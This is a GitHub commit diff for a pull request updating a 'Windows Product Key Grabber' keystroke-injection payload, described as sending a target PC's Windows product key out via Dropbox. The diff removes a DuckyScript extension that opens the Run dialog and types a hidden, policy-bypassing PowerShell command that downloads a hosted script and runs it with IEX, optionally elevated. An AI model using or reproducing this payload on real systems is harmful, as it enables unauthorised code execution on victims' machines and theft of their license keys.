Merge pull request #474 from PlumpyTurkey/master

Fix “Windows Product Key Grabber” payload
pull/476/head
Peaks 2024-08-23 05:27:29 -04:00 committed by GitHub
commit ad08ba6e36
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 2 additions and 37 deletions

View File

@ -8,7 +8,7 @@
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge">
<img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
</a>
</p>

View File

@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
Author: PlumpyTurkey
Description: This payload sends you the target PC's Windows product key via Dropbox.
Target: Windows 10, 11
Version: 1.1
Version: 1.2
Category: Exfiltration
END_REM
@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
RHP_RUN()